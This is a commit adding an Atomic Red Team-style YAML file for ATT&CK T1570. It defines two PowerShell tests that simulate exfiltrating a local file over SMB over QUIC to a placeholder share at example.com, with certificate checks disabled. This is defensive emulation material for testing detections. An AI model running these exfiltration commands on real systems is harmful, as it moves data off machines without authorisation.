Create T1570.yaml (#2476)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>

atomics/T1570/T1570.yaml

@@ -0,0 +1,51 @@
+attack_technique: T1570
+display_name: 'Lateral Tool Transfer'
+atomic_tests:
+- name: Exfiltration Over SMB over QUIC (New-SmbMapping)
+  description: |
+    Simulates an attacker exfiltrating data over SMB over QUIC using the New-SmbMapping command.
+    Prerequisites:
+      - A file server running Windows Server 2022 Datacenter: Azure Edition
+      - A Windows 11 computer
+      - Windows Admin Center
+  supported_platforms:
+    - windows
+  input_arguments:
+    remote_path:
+      description: The UNC path to the share on the file server
+      type: string
+      default: '\\example.com\sales'
+    local_file:
+      description: The local file to be transferred
+      type: path
+      default: 'C:\path\to\file.txt'
+  executor:
+    command: |
+      New-SmbMapping -RemotePath '#{remote_path}' -TransportType QUIC -SkipCertificateCheck
+      copy '#{local_file}' 'Z:\'
+    name: powershell
+    elevation_required: true
+- name: Exfiltration Over SMB over QUIC (NET USE)
+  description: |
+    Simulates an attacker exfiltrating data over SMB over QUIC using the NET USE command.
+    Prerequisites:
+      - A file server running Windows Server 2022 Datacenter: Azure Edition
+      - A Windows 11 computer
+      - Windows Admin Center
+  supported_platforms:
+    - windows
+  input_arguments:
+    remote_path:
+      description: The UNC path to the share on the file server
+      type: string
+      default: '\\example.com\sales'
+    local_file:
+      description: The local file to be transferred
+      type: path
+      default: 'C:\path\to\file.txt'
+  executor:
+    command: |
+      NET USE * '#{remote_path}' /TRANSPORT:QUIC /SKIPCERTCHECK
+      copy '#{local_file}' '*:\'
+    name: powershell
+    elevation_required: true